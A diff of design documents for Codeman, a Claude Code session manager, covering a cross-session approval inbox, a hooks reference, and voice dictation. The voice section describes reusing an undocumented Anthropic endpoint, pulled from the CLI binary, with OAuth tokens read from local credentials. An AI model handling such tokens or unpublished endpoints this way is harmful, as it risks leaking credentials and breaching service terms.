One cross-session inbox for every prompt that is waiting on a human: permission dialogs, questions (AskUserQuestion / elicitation), and idle prompts. Cards are answerable in place (option digits, Esc, or a typed prompt) from desktop, phone overview, and push notification action buttons. Inspired by Cloudflare OS's Gatekeeper approval queue (https://github.com/cloudflare/cloudflare-os, asynchronous human-in-the-loop approvals): with a fleet of sessions the human is the bottleneck, and today answering means finding the right tab.
|
||||
|
||||
## Problems this fixes (all real today)
|
||||
|
||||
1. **No cross-session surface.** Pending prompts exist only as per-tab alert colors (`tab-alert-action`/`tab-alert-idle`) and NEEDS YOU rows on the phone overview. Answering means switching to the session and typing.
|
||||
2. **Alerts die on reload.** `pendingHooks` lives only in `app.js` memory, fed by transient SSE `hook:*` events. A page reload (or a phone browser evicting the tab) silently loses every pending alert. There is no server-side record.
|
||||
3. **Push Approve/Deny buttons are dead.** `PUSH_EVENT_MAP` already attaches `approve`/`deny` actions to permission pushes, and `sw.js` forwards `event.action` to the page, but the `notification-click` handler in settings-ui.js ignores it (and when no tab is open, the action is dropped entirely). The buttons render on the lock screen and do nothing.
|
||||
4. **Card context is missing.** The frontend handlers read `data.question` / `data.message` / `data.tool`, but `sanitizeHookData` never forwards `message`, so notifications show generic fallback text.
|
||||
|
||||
## Scope
|
||||
|
||||
- Claude mode only (hooks fire only for `claude`; external CLIs keep their output-stabilization heuristics and get no inbox items). This mirrors the wait-primitive `stop`/`blocked` gating.
|
||||
- Permission prompts occur for sessions running `ClaudeMode` `normal` / `auto` / `allowedTools` (and the trust-folder dialog even under skip-permissions). Question and idle prompts occur in every mode including `dangerously-skip-permissions`.
|
||||
- In-memory store (plus the frontend seeding from it on load). Server restart drops items; hooks re-fire on the next prompt. No new state file in v1.
|
||||
|
||||
## Data model
|
||||
|
||||
At most **one active item per session**: the Claude TUI shows one dialog at a time, so a new prompt event supersedes the session's previous item (resolution `superseded`).
|
||||
|
||||
```ts
|
||||
interface ApprovalItem {
|
||||
id: string; // `${sessionId}:${seq}`
|
||||
sessionId: string;
|
||||
sessionName: string;
|
||||
kind: 'permission' | 'question' | 'idle';
|
||||
createdAt: number;
|
||||
toolName?: string; // from sanitized hook data
|
||||
toolSummary?: string; // command / file_path / description, already bounded
|
||||
message?: string; // Notification hook `message` (newly allowlisted)
|
||||
cwd?: string;
|
||||
context?: string; // ANSI-stripped visible pane frame tail, ≤ 4000 chars
|
||||
options?: { n: number; label: string }[]; // parsed from context when confident
|
||||
}
|
||||
```
|
||||
|
||||
Resolutions (server-emitted, item removed from pending): `answered` (via inbox), `resolved_in_terminal` (stop / elicitation_complete / elicitation_response / session went working), `superseded`, `session_ended`, `dismissed`, `expired` (12h TTL sweep).
|
||||
|
||||
## Backend
|
||||
|
||||
### Store: `src/approval-inbox.ts`
|
||||
|
||||
Module-level singleton in the style of `session-wait-registry.ts` (pure, no `Session` import, injected emit callback so there is no import cycle with the server):
|
||||
|
||||
- `notePrompt(info)` creates/supersedes the session's item; schedules ONE re-capture ~600ms later (the Notification hook can fire before the dialog finishes painting) which updates `context`/`options` and emits `approval:updated`.
|
||||
- `resolveForSession(sessionId, reason)`, `dismiss(id)`, `answerable(id)`, `listPending()`, `stop()` (clears timers; tests).
|
||||
- Option parsing (pure, unit-tested): consecutive `❯? N. label` lines, 2..6 options, labels ≤ 120 chars. Parsed options gate which digits the answer endpoint accepts; when parsing fails the card falls back to Approve(1)/Deny(Esc) only.
|
||||
- TTL: items expire after 12h (checked on read + a lazy sweep; no standing interval).
|
||||
|
||||
### Wiring
|
||||
|
||||
- `hook-event-routes.ts`: on `permission_prompt` / `elicitation_dialog` / `idle_prompt`, call `notePrompt` with sanitized data + a pane capture callback (`mux.capturePaneBuffer(muxName)` visible frame, ANSI-stripped via existing utils; fall back to `session.terminalBuffer` tail). On `stop` / `elicitation_complete` / `elicitation_response`, `resolveForSession(id, 'resolved_in_terminal')`.
|
||||
- `session-listener-wiring.ts`: `working` listener resolves **idle items only** (`working` is heuristic and can flap mid-turn, so it must never clear a pending permission/question dialog); `exit` resolves with `session_ended`. Same singleton-import pattern as `sessionWaits`.
|
||||
- Session delete route: resolve with `session_ended`.
|
||||
- **New hook matchers** `elicitation_complete` + `elicitation_response` added to `generateHooksConfig()`, `HookEventType`, `HookEventSchema`, and both SSE registries. `refreshStaleCodemanHooks` gets a staleness probe for them (`hooksJson.includes('elicitation_complete')`) so existing cases heal on next Claude spawn, exactly like the `-k`/secret/marker probes.
|
||||
- `sanitizeHookData`: allowlist `message` (bounded 500 chars). This also un-deadens the existing notification text paths.
|
||||
|
||||
### Routes: `src/web/routes/approval-routes.ts`
|
||||
|
||||
Normal authed API (NOT the hook-secret bypass), `ApiResponse` envelope, Zod schemas in `schemas.ts`:
|
||||
|
||||
- `GET /api/approvals` → pending items, multi-user filtered by `canAccessOwned` (same policy as session lists).
|
||||
- `POST /api/approvals/:id/answer` body `{ action: 'approve' | 'deny' | 'option' | 'text', option?, text? }`:
|
||||
- `approve` → `writeViaMux('1')` (option 1 is always plain Yes; no Enter, menus react to the digit).
|
||||
- `deny` → `writeViaMux('\x1b')` (Esc is the official No/cancel; precedent: auto-resume sends Esc the same way).
|
||||
- `option` → digit `String(n)`; accepted only when `n` is within the item's parsed options (prevents blind digit-poking at an unparsed dialog).
|
||||
- `text` → `idle` items only: single line, embedded newlines stripped, sent as `text\r` (the `\r` discipline from CLAUDE.md).
|
||||
- Guards: item still pending (404 otherwise), session exists + ownership via `findSessionOrFail`, session mode installs hooks. **Answer-time re-capture**: for items whose frame parsed options, the pane is re-captured before sending; if the dialog no longer parses, the item resolves and the answer is refused with 409 (the keystroke would land in whatever now has focus). Marks `answered` BEFORE the write so a double-tap cannot double-send; rolls back to pending if the write fails.
|
||||
- `POST /api/approvals/:id/dismiss` → remove without keystrokes.
|
||||
|
||||
### SSE
|
||||
|
||||
`approval:pending`, `approval:updated`, `approval:resolved` in `sse-events.ts` + `SSE_EVENTS` in constants.js (the parity test pins the sync). Broadcasts carry `sessionId`, so multi-user SSE scoping applies unchanged.
|
||||
|
||||
### Push
|
||||
|
||||
- `sendPushNotifications` payload gains `approvalId` for the three hook events. Both `approvalId` and the Approve/Deny `actions` are **gated on the opt-in setting**: with it off, permission pushes carry no buttons at all (pre-inbox they rendered and did nothing, so stripping them is the honest shape).
|
||||
- `sw.js` `notificationclick`: when `event.action` is `approve`/`deny`, POST `/api/approvals/:id/answer` directly from the worker (same-origin, cookie credentials) so the buttons work **with no tab open**; on failure fall back to focusing/opening a tab. Non-action clicks keep today's behavior.
|
||||
- Page-side `notification-click` handler: honor `action` instead of dropping it (also setting-gated, for stale notifications sent before the toggle flipped).
|
||||
- Question/idle pushes keep no action buttons (options vary per dialog); tapping opens the inbox.
|
||||
|
||||
## Frontend
|
||||
|
||||
New module `approvals-ui.js` (@loadorder 11.2, after panels-ui.js), prettier-formatted (not added to `.prettierignore`).
|
||||
|
||||
- **Seed on connect**: `GET /api/approvals` on init and SSE reconnect; each pending item re-feeds `setPendingHook(...)` so tab alerts and the phone overview survive reload (fixes problem 2 with zero changes to the alert state machine).
|
||||
- **Desktop**: header bell `btn-approvals` with count badge. Ships default-hidden via marker class `btn-approvals--hidden` (same policy as the attachments button, so `test/mobile-header-buttons-policy.test.ts` excludes it from the default-visible enumeration); JS shows it only while count > 0. Click toggles a drawer of cards: session name + kind, tool/message summary, mono context block, buttons rendered from parsed options (else Approve/Deny), plus Dismiss and Open session. Esc closes; existing z-index layers respected.
|
||||
- **Phone**: header button stays hidden (`mobile.css`); the phone surface is the overview's NEEDS YOU section, whose rows gain inline ✓/✗ buttons for permission items (tap-through to the session remains the row's main action). Toolbar classes/status language rules from the mobile-overview section of CLAUDE.md apply.
|
||||
- **i18n**: new strings registered in i18n.js (en + zh-CN); status words carry `data-i18n-skip` where they would collide (mirroring the overview pills).
|
||||
- **Setting**: `approvalsInboxEnabled`, synced (in `SettingsUpdateSchema`), **default OFF** (owner decision: the entire feature is opt-in, meaning no bell, no drawer, no overview strips, no seeding, and no push action buttons until enabled in App Settings → Panels). Only the store and answer endpoints keep running regardless, so flipping the toggle ON surfaces anything already pending immediately, with no restart.
|
||||
|
||||
## Race honesty
|
||||
|
||||
The prompt can be answered in the terminal a moment before an inbox answer lands; then the keystroke would hit whatever now has focus (worst case: a digit typed into the composer, not submitted, since no `\r` is ever sent for menu answers). Mitigations, in order: answer-time re-capture (the dialog must still parse on screen or the answer is refused), answered-before-write marking, digit-only/Esc-only writes for menus, and the card's context block showing what the pane looked like when captured. This is the same class of risk `writeViaMux` automation (auto-resume, respawn) already accepts.
|
||||
|
||||
## Tests
|
||||
|
||||
- `test/approval-inbox.test.ts`: supersede per session, every resolution path, TTL, option parsing fixtures (2-option, 3-option with ❯, unparseable frame), re-capture update.
|
||||
- `test/routes/approval-routes.test.ts` (`app.inject`, no port): list; hook event creates item; answer approve/deny/option writes the exact bytes (test-PTY echo asserts them); text answers restricted to idle; 404 unknown id; 409 answered twice; option out of range rejected; multi-user scoping.
|
||||
- Existing suites extended: hook-event schema accepts the two new events; `sanitizeHookData` forwards bounded `message`; SSE parity + mobile-header policy pass as-is by construction.
|
||||
|
||||
## Docs
|
||||
|
||||
- CLAUDE.md: Key Patterns entry + SSE/route counts + frontend load order.
|
||||
- `docs/api-reference.md`: the two endpoints + three SSE events (additive, fine under the 0.9.x contract).
|
||||
@@ -300,6 +300,11 @@ For reference when writing browser tests:
|
||||
.xterm // Terminal container
|
||||
#helpModal // Help modal
|
||||
#appSettingsModal // Settings modal
|
||||
#sessionOptionsModal // Session Options (same set-* surface)
|
||||
#createCaseModal // Add Case (same set-* surface)
|
||||
.set-rail-item // Rail entry: scrolls in App Settings, switches in the other two
|
||||
.set-section // A settings section (`.hidden` on the inactive ones outside App Settings)
|
||||
.set-row // One setting: label + description left, control right
|
||||
.modal-content // Modal content
|
||||
.modal-close // Modal close button
|
||||
.header-brand .logo // Logo text
|
||||
|
||||
@@ -2,14 +2,18 @@
|
||||
|
||||
> Official documentation for Claude Code hooks system, extracted from [code.claude.com](https://code.claude.com/docs/en/hooks).
|
||||
|
||||
**Last Updated**: 2026-01-24
|
||||
**Last Updated**: 2026-07-25
|
||||
**Source**: [Claude Code Hooks Documentation](https://code.claude.com/docs/en/hooks)
|
||||
|
||||
> This is a maintained summary, not an exhaustive copy of the upstream reference.
|
||||
> Check the source link for event-specific schemas before adding a new hook.
|
||||
|
||||
---
|
||||
|
||||
## Overview
|
||||
|
||||
Hooks are automated scripts that execute at specific events during your Claude Code session. They allow you to:
|
||||
|
||||
- Validate, modify, or block tool usage
|
||||
- Add context to prompts
|
||||
- Implement custom workflows
|
||||
@@ -21,12 +25,12 @@ Hooks are automated scripts that execute at specific events during your Claude C
|
||||
|
||||
Hooks are configured in settings files:
|
||||
|
||||
| File | Scope |
|
||||
|------|-------|
|
||||
| `~/.claude/settings.json` | User (global) |
|
||||
| `.claude/settings.json` | Project |
|
||||
| File | Scope |
|
||||
| ----------------------------- | -------------------------- |
|
||||
| `~/.claude/settings.json` | User (global) |
|
||||
| `.claude/settings.json` | Project |
|
||||
| `.claude/settings.local.json` | Local project (gitignored) |
|
||||
| Plugin hook files | Plugin-specific |
|
||||
| Plugin hook files | Plugin-specific |
|
||||
|
||||
### Basic Structure
|
||||
|
||||
@@ -49,8 +53,9 @@ Hooks are configured in settings files:
|
||||
```
|
||||
|
||||
**Key Fields**:
|
||||
|
||||
- `matcher`: Pattern to match tool names (case-sensitive, supports regex like `Edit|Write` or `*` for all)
|
||||
- `type`: `"command"` for bash or `"prompt"` for LLM-based evaluation
|
||||
- `type`: `"command"`, `"http"`, `"mcp_tool"`, `"prompt"`, or `"agent"` where the event supports it
|
||||
- `command`: Bash command to execute
|
||||
- `prompt`: LLM prompt for evaluation (prompt-based hooks only)
|
||||
- `timeout`: Optional timeout in seconds (default: 60)
|
||||
@@ -59,6 +64,10 @@ Hooks are configured in settings files:
|
||||
|
||||
## Hook Events
|
||||
|
||||
Claude Code's current event surface is broader than the detailed subset below. In
|
||||
particular, `TeammateIdle` and `TaskCompleted` are supported lifecycle events used
|
||||
by Codeman; they are not stale or plugin-defined event names.
|
||||
|
||||
### PreToolUse
|
||||
|
||||
**When**: After Claude creates tool parameters, before processing the tool call.
|
||||
@@ -66,15 +75,17 @@ Hooks are configured in settings files:
|
||||
**Use Cases**: Approval, denial, or modification of tool calls.
|
||||
|
||||
**Common Matchers**:
|
||||
|
||||
- `Bash` - Shell commands
|
||||
- `Write` - File writing
|
||||
- `Edit` - File editing
|
||||
- `Read` - File reading
|
||||
- `Task` - Subagent tasks
|
||||
- `Agent` - Subagent tasks
|
||||
- `WebFetch`, `WebSearch` - Web operations
|
||||
- `mcp__<server>__<tool>` - MCP tools
|
||||
|
||||
**Output Control**:
|
||||
|
||||
```json
|
||||
{
|
||||
"hookSpecificOutput": {
|
||||
@@ -96,13 +107,14 @@ Hooks are configured in settings files:
|
||||
**Use Cases**: Auto-approve or deny permissions.
|
||||
|
||||
**Output Control**:
|
||||
|
||||
```json
|
||||
{
|
||||
"hookSpecificOutput": {
|
||||
"hookEventName": "PermissionRequest",
|
||||
"decision": {
|
||||
"behavior": "allow|deny",
|
||||
"updatedInput": { },
|
||||
"updatedInput": {},
|
||||
"message": "deny reason",
|
||||
"interrupt": false
|
||||
}
|
||||
@@ -117,6 +129,7 @@ Hooks are configured in settings files:
|
||||
**Use Cases**: Provide feedback, run formatters/linters, log operations.
|
||||
|
||||
**Output Control**:
|
||||
|
||||
```json
|
||||
{
|
||||
"decision": "block",
|
||||
@@ -128,15 +141,38 @@ Hooks are configured in settings files:
|
||||
}
|
||||
```
|
||||
|
||||
#### Asynchronous Rewake
|
||||
|
||||
Command hooks can set `"asyncRewake": true` to run asynchronously and wake an
|
||||
idle Claude turn when the hook exits with code 2. The hook's stderr is delivered
|
||||
to Claude as a system reminder. This implies `"async": true`; ordinary async
|
||||
hooks do not wake an idle turn, and their output waits for the next interaction.
|
||||
|
||||
Codeman uses this on `PostToolUse(Bash)`: a self-contained Node helper extracts
|
||||
the background task ID from the Bash result, watches the originating transcript
|
||||
and, for subagents, the top-level parent transcript for the matching completion
|
||||
notification, and exits 2. Claude records a subagent's Bash result in its
|
||||
`subagents/agent-*.jsonl` file but queues completion in the lead session JSONL.
|
||||
The task ID keeps each wake targeted. The helper does not send terminal input,
|
||||
so it cannot submit a user's partially written prompt.
|
||||
|
||||
For script-dispatched Codex work, `codex-run.sh` writes the final response
|
||||
between `CODEMAN_RESULT_BEGIN/END` markers in the background task output. The
|
||||
rewake helper includes a maximum of 64 KiB of that report in its feedback. UI
|
||||
subagent discovery and dispatcher result delivery are separate contracts.
|
||||
|
||||
### Notification
|
||||
|
||||
**When**: When Claude Code sends notifications.
|
||||
|
||||
**Matchers**:
|
||||
|
||||
- `permission_prompt`
|
||||
- `idle_prompt`
|
||||
- `auth_success`
|
||||
- `elicitation_dialog`
|
||||
- `elicitation_complete`
|
||||
- `elicitation_response`
|
||||
|
||||
### UserPromptSubmit
|
||||
|
||||
@@ -145,6 +181,7 @@ Hooks are configured in settings files:
|
||||
**Use Cases**: Add context, validate, or block prompts.
|
||||
|
||||
**Output Control**:
|
||||
|
||||
```json
|
||||
{
|
||||
"decision": "block",
|
||||
@@ -165,6 +202,7 @@ Hooks are configured in settings files:
|
||||
**Use Cases**: **Ralph Wiggum loops** - block exit and refeed prompt.
|
||||
|
||||
**Output Control**:
|
||||
|
||||
```json
|
||||
{
|
||||
"decision": "block",
|
||||
@@ -173,6 +211,7 @@ Hooks are configured in settings files:
|
||||
```
|
||||
|
||||
Or to allow exit:
|
||||
|
||||
```json
|
||||
{
|
||||
"continue": true,
|
||||
@@ -184,15 +223,42 @@ Or to allow exit:
|
||||
|
||||
### SubagentStop
|
||||
|
||||
**When**: When a subagent (Task tool call) finishes responding.
|
||||
**When**: When a subagent (Agent tool call) finishes responding.
|
||||
|
||||
**Use Cases**: Control nested loops, verify subagent output.
|
||||
|
||||
The hook input includes `agent_id`, `agent_transcript_path`, and
|
||||
`last_assistant_message`. Like `Stop`, a command hook can return
|
||||
`{"decision":"block","reason":"..."}` to keep the subagent running and feed
|
||||
the reason back to it.
|
||||
|
||||
Codeman uses this to prevent premature reports from workers that still own live
|
||||
Monitor or background-Bash processes. It derives candidate task IDs from the
|
||||
subagent transcript, but requires a matching live Linux process descriptor for
|
||||
`tasks/<id>.output`; historical task text by itself is not treated as active.
|
||||
|
||||
### TeammateIdle
|
||||
|
||||
**When**: When an agent-team teammate is about to go idle.
|
||||
|
||||
**Use Cases**: Reassign work, continue a teammate loop, or notify an orchestrator.
|
||||
|
||||
**Matcher Support**: None. The hook fires for every occurrence.
|
||||
|
||||
### TaskCompleted
|
||||
|
||||
**When**: When a task is about to be marked completed.
|
||||
|
||||
**Use Cases**: Validate completion or forward team progress to an external UI.
|
||||
|
||||
**Matcher Support**: None. The hook fires for every occurrence.
|
||||
|
||||
### PreCompact
|
||||
|
||||
**When**: Before a compact operation.
|
||||
|
||||
**Matchers**:
|
||||
|
||||
- `manual` - Invoked from `/compact`
|
||||
- `auto` - Invoked from auto-compact
|
||||
|
||||
@@ -201,6 +267,7 @@ Or to allow exit:
|
||||
**When**: When Claude Code starts or resumes a session.
|
||||
|
||||
**Matchers**:
|
||||
|
||||
- `startup` - Fresh start
|
||||
- `resume` - From `--resume`, `--continue`, or `/resume`
|
||||
- `clear` - From `/clear`
|
||||
@@ -209,6 +276,7 @@ Or to allow exit:
|
||||
**Use Cases**: Load development context, set environment variables.
|
||||
|
||||
**Persisting Environment Variables**:
|
||||
|
||||
```bash
|
||||
#!/bin/bash
|
||||
if [ -n "$CLAUDE_ENV_FILE" ]; then
|
||||
@@ -219,6 +287,7 @@ exit 0
|
||||
```
|
||||
|
||||
**Output Control**:
|
||||
|
||||
```json
|
||||
{
|
||||
"hookSpecificOutput": {
|
||||
@@ -233,6 +302,7 @@ exit 0
|
||||
**When**: When a session ends.
|
||||
|
||||
**Reason Values**:
|
||||
|
||||
- `clear`
|
||||
- `logout`
|
||||
- `prompt_input_exit`
|
||||
@@ -254,7 +324,7 @@ Hooks receive JSON via stdin with common fields:
|
||||
"permission_mode": "default",
|
||||
"hook_event_name": "PreToolUse",
|
||||
"tool_name": "Bash",
|
||||
"tool_input": { },
|
||||
"tool_input": {},
|
||||
"tool_use_id": "toolu_01ABC123..."
|
||||
}
|
||||
```
|
||||
@@ -262,6 +332,7 @@ Hooks receive JSON via stdin with common fields:
|
||||
### Tool-Specific Input
|
||||
|
||||
**Bash**:
|
||||
|
||||
```json
|
||||
{
|
||||
"tool_name": "Bash",
|
||||
@@ -274,6 +345,7 @@ Hooks receive JSON via stdin with common fields:
|
||||
```
|
||||
|
||||
**Write**:
|
||||
|
||||
```json
|
||||
{
|
||||
"tool_name": "Write",
|
||||
@@ -285,6 +357,7 @@ Hooks receive JSON via stdin with common fields:
|
||||
```
|
||||
|
||||
**Edit**:
|
||||
|
||||
```json
|
||||
{
|
||||
"tool_name": "Edit",
|
||||
@@ -302,11 +375,11 @@ Hooks receive JSON via stdin with common fields:
|
||||
|
||||
### Exit Codes
|
||||
|
||||
| Code | Behavior |
|
||||
|------|----------|
|
||||
| 0 | Success. `stdout` processed (shown in verbose or added as context) |
|
||||
| 2 | Blocking error. Only `stderr` used. Blocks tool/prompt based on event |
|
||||
| Other | Non-blocking error. `stderr` shown in verbose, execution continues |
|
||||
| Code | Behavior |
|
||||
| ----- | --------------------------------------------------------------------- |
|
||||
| 0 | Success. `stdout` processed (shown in verbose or added as context) |
|
||||
| 2 | Blocking error. Only `stderr` used. Blocks tool/prompt based on event |
|
||||
| Other | Non-blocking error. `stderr` shown in verbose, execution continues |
|
||||
|
||||
### JSON Output (Exit Code 0)
|
||||
|
||||
@@ -323,7 +396,12 @@ Hooks receive JSON via stdin with common fields:
|
||||
|
||||
## Prompt-Based Hooks
|
||||
|
||||
For Stop and SubagentStop events, you can use LLM-based evaluation:
|
||||
Prompt and agent handlers are supported by decision-oriented events including
|
||||
`PreToolUse`, `PermissionRequest`, `PostToolUse`, `PostToolUseFailure`,
|
||||
`PostToolBatch`, `UserPromptSubmit`, `Stop`, `SubagentStop`, `TaskCreated`, and
|
||||
`TaskCompleted`. Check the upstream reference before choosing a handler type.
|
||||
|
||||
For example, a Stop event can use LLM-based evaluation:
|
||||
|
||||
```json
|
||||
{
|
||||
@@ -344,6 +422,7 @@ For Stop and SubagentStop events, you can use LLM-based evaluation:
|
||||
```
|
||||
|
||||
**LLM Response Format**:
|
||||
|
||||
```json
|
||||
{
|
||||
"ok": true,
|
||||
@@ -362,17 +441,18 @@ Hooks can be defined in Skills, Agents, and Slash Commands using frontmatter:
|
||||
name: secure-operations
|
||||
hooks:
|
||||
PreToolUse:
|
||||
- matcher: "Bash"
|
||||
- matcher: 'Bash'
|
||||
hooks:
|
||||
- type: command
|
||||
command: "./scripts/security-check.sh"
|
||||
command: './scripts/security-check.sh'
|
||||
---
|
||||
```
|
||||
|
||||
These hooks:
|
||||
|
||||
- Are scoped to the component's lifecycle
|
||||
- Only run when that component is active
|
||||
- Support: PreToolUse, PostToolUse, Stop
|
||||
- Support all hook events; a subagent-scoped `Stop` is converted to `SubagentStop`
|
||||
|
||||
---
|
||||
|
||||
@@ -550,11 +630,11 @@ exit 0
|
||||
|
||||
## Environment Variables
|
||||
|
||||
| Variable | Description |
|
||||
|----------|-------------|
|
||||
| `CLAUDE_PROJECT_DIR` | Project root directory |
|
||||
| `CLAUDE_CODE_REMOTE` | `"true"` for web, empty for CLI |
|
||||
| `CLAUDE_ENV_FILE` | Path to write persistent env vars (SessionStart) |
|
||||
| Variable | Description |
|
||||
| -------------------- | ------------------------------------------------ |
|
||||
| `CLAUDE_PROJECT_DIR` | Project root directory |
|
||||
| `CLAUDE_CODE_REMOTE` | `"true"` for web, empty for CLI |
|
||||
| `CLAUDE_ENV_FILE` | Path to write persistent env vars (SessionStart) |
|
||||
|
||||
---
|
||||
|
||||
@@ -593,4 +673,4 @@ Use `/hooks` command to view registered hooks and make changes.
|
||||
|
||||
---
|
||||
|
||||
*Source: [Claude Code Hooks Documentation](https://code.claude.com/docs/en/hooks)*
|
||||
_Source: [Claude Code Hooks Documentation](https://code.claude.com/docs/en/hooks)_
|
||||
|
||||
@@ -0,0 +1,121 @@
|
||||
# Claude voice dictation in Codeman
|
||||
|
||||
Wire Codeman's existing mic button to the same speech-to-text service Claude Code's own
|
||||
`/voice` mode uses, so dictation works with **no third-party API key** for anyone already
|
||||
signed in to Claude Code on the server.
|
||||
|
||||
## Why the CLI's own voice mode cannot be reused directly
|
||||
|
||||
Claude Code 2.1.x ships voice input: `/voice hold|tap|off` arms it, the CLI opens the
|
||||
**host's** microphone (native `audio-capture-napi`, falling back to `sox`/`arecord` on Linux
|
||||
after probing `/proc/asound/cards`), streams PCM upstream and types the transcript into its
|
||||
own composer.
|
||||
|
||||
Every part of that is on the wrong machine for Codeman. The CLI runs inside a tmux pane on
|
||||
the server, which is typically headless and has no sound card at all, while the human is in
|
||||
a browser on a phone somewhere else. Toggling `/voice` in the pane from Codeman would arm a
|
||||
microphone nobody is sitting in front of. So Codeman keeps capturing audio in the browser,
|
||||
where the user actually is, and only borrows the CLI's **transcription backend**.
|
||||
|
||||
## The backend, as the CLI uses it
|
||||
|
||||
Extracted from the 2.1.226 binary (`connectVoiceStream`):
|
||||
|
||||
| | |
|
||||
| --- | --- |
|
||||
| URL | `wss://api.anthropic.com/api/ws/speech_to_text/voice_stream` |
|
||||
| Query | `encoding=linear16`, `sample_rate=16000`, `channels=1`, `endpointing_ms=300`, `utterance_end_ms=1000`, `language=<lang>`, `use_conversation_engine=true`, `stt_provider=deepgram-nova3` |
|
||||
| Headers | `Authorization: Bearer <Claude Code OAuth access token>`, `User-Agent`, `x-app: cli`, `anthropic-client-platform`, optional `x-config-keyterms` |
|
||||
| Audio | raw binary frames, PCM signed 16-bit little-endian, 16 kHz, mono |
|
||||
| Keepalive | `{"type":"KeepAlive"}` on open, then every 8 s |
|
||||
| Finalize | `{"type":"CloseStream"}`, then wait for the endpoint frame |
|
||||
| Downstream | `{"type":"TranscriptText"\|"TranscriptInterim","data":"…"}` (running interim), `{"type":"TranscriptEndpoint"}` (promotes the pending interim to final), `{"type":"TranscriptError",…}`, `{"type":"error","message":…}` |
|
||||
|
||||
Deepgram Nova-3 runs server-side, so the Deepgram-quality result arrives without a Deepgram
|
||||
account. Verified against the live endpoint before this design was written: connect, stream
|
||||
PCM, receive interims and an endpoint frame.
|
||||
|
||||
## Architecture
|
||||
|
||||
The browser cannot call that endpoint itself: it would need the OAuth bearer token in page
|
||||
JavaScript (and CORS would refuse anyway). So the audio goes browser → Codeman → Anthropic,
|
||||
and Codeman is the only thing that ever touches the token.
|
||||
|
||||
```
|
||||
mic → AudioWorklet (Float32 → PCM16 @16 kHz)
|
||||
→ wss://<codeman>/ws/voice/stream [cookie/basic auth, Origin+Host guarded]
|
||||
→ VoiceStreamRelay (reads ~/.claude/.credentials.json per connect)
|
||||
→ wss://api.anthropic.com/api/ws/speech_to_text/voice_stream
|
||||
← {"t":"transcript","text":…,"final":…} → existing _insertText() path
|
||||
```
|
||||
|
||||
Nothing about the insert path changes: the transcript lands in the same preview overlay,
|
||||
the same direct/compose insert modes, the same green Send button.
|
||||
|
||||
### Server pieces
|
||||
|
||||
- **`src/claude-credentials.ts`** — locate and parse the Claude Code OAuth credentials.
|
||||
`parseClaudeCredentials()` is pure (JSON string + `now` → status) and unit-tested;
|
||||
`readClaudeOAuthToken()` wraps it with IO: `$CLAUDE_CONFIG_DIR/.credentials.json` or
|
||||
`~/.claude/.credentials.json`, and on macOS the login keychain
|
||||
(`security find-generic-password -s "Claude Code-credentials"`).
|
||||
**Read-only, always.** Codeman never writes credentials and never refreshes the token: a
|
||||
refresh rotates the refresh token, and racing Claude Code's own refresh could sign the
|
||||
user out of their CLI. An expired token surfaces as a plain "run a Claude session to
|
||||
refresh" error instead.
|
||||
The token is never logged, never returned by any endpoint, and never sent to the browser.
|
||||
|
||||
- **`src/web/voice-stream.ts`** — pure `buildVoiceStreamUrl()` / `buildVoiceStreamHeaders()` /
|
||||
`sanitizeKeyterms()` (ASCII-only, deduped, 1024-char cap, mirroring the CLI), plus
|
||||
`VoiceStreamRelay`, which owns one upstream socket: keepalive timer, audio passthrough,
|
||||
transcript translation, finalize, and the caps below.
|
||||
|
||||
- **`src/web/routes/voice-routes.ts`**
|
||||
- `GET /api/voice/status` → `{ available, reason, subscriptionType?, expiresAt? }`. Never
|
||||
the token. `available:false` with a machine-readable `reason` (`disabled`, `no-credentials`,
|
||||
`expired`) is what the settings row and the provider resolver read.
|
||||
- `GET /ws/voice/stream?language=&keyterms=` → the relay. Same upgrade guard as
|
||||
`/ws/sessions/:id/terminal`: allowed Host, same-site Origin, and the global auth hook has
|
||||
already run on the handshake.
|
||||
|
||||
Caps, because an open mic is an open pipe: one stream per connection, `MAX_VOICE_STREAMS`
|
||||
concurrent server-wide, a hard `MAX_STREAM_MS` per stream, and a per-frame size cap. A tab
|
||||
left recording cannot bill an unbounded amount of upstream audio.
|
||||
|
||||
### Frontend pieces
|
||||
|
||||
- **`voice-pcm-worklet.js`** — an `AudioWorkletProcessor` converting Float32 blocks to PCM16
|
||||
and posting ~256 ms frames back. `MediaRecorder` cannot produce raw PCM, which is why the
|
||||
existing Deepgram path (container audio, auto-detected) cannot be reused as-is. Falls back
|
||||
to `ScriptProcessorNode` where AudioWorklet is unavailable.
|
||||
- **`ClaudeVoiceProvider`** in `voice-input.js` — mirrors `DeepgramProvider`'s shape
|
||||
(`start({language, keyterms, onStream, onResult, onError, onEnd})`) so `VoiceInput` treats
|
||||
the three providers uniformly.
|
||||
- **Provider resolution** — new `voiceSettings.provider`: `auto` (default) | `claude` |
|
||||
`deepgram` | `webspeech`. `auto` picks Claude when `/api/voice/status` reports it
|
||||
available, else Deepgram when a key is set, else Web Speech. Pinning a provider always
|
||||
wins, so an existing Deepgram user can keep exactly what they have.
|
||||
|
||||
### Settings
|
||||
|
||||
- `claudeVoiceEnabled` — synced, **default OFF**, gating the whole server side. Off is the
|
||||
honest default: turning it on means this machine's Claude subscription starts paying for
|
||||
transcription for whoever can reach the UI, and the audio goes to Anthropic rather than to
|
||||
wherever it went before. One switch in Settings → Voice, and the mic works with no key.
|
||||
- `voiceSettings.provider` — per the resolution table above; joins the existing synced
|
||||
`voiceSettings` object.
|
||||
|
||||
## Things worth knowing
|
||||
|
||||
- **This uses an undocumented endpoint with subscription credentials.** It is the user's own
|
||||
token, on the user's own machine, driving the user's own Claude Code install, but it is not
|
||||
a published API and Anthropic can change or restrict it. Default-OFF is deliberate; the
|
||||
Deepgram and Web Speech paths stay untouched as the supported fallbacks.
|
||||
- **Multi-user mode**: every user's dictation would run on the server owner's Claude
|
||||
credentials, exactly as every user's *sessions* already run on them. Consistent, but worth
|
||||
stating out loud in the settings copy.
|
||||
- **Token lifetime** is about 8 hours, refreshed by Claude Code itself whenever it runs. The
|
||||
relay re-reads the file on every connect rather than caching, so a refresh is picked up on
|
||||
the next press of the mic.
|
||||
- **HTTPS or localhost**: `getUserMedia` needs a secure context. Prod is HTTPS behind
|
||||
`tailscale serve`, so this is already satisfied; the existing error copy covers the rest.
|
||||
@@ -0,0 +1,588 @@
|
||||
# Claude Code Build Brief: Add Scheduling to Codeman
|
||||
|
||||
## 0. Purpose of This Brief
|
||||
|
||||
You are Claude Code working inside the Codeman repository.
|
||||
|
||||
Your task is to add a **small, reliable scheduling layer** to Codeman while preserving Codeman's existing architecture and session-management behavior.
|
||||
|
||||
This is not a greenfield rewrite. This is not a full product rebuild. This is a focused extension.
|
||||
|
||||
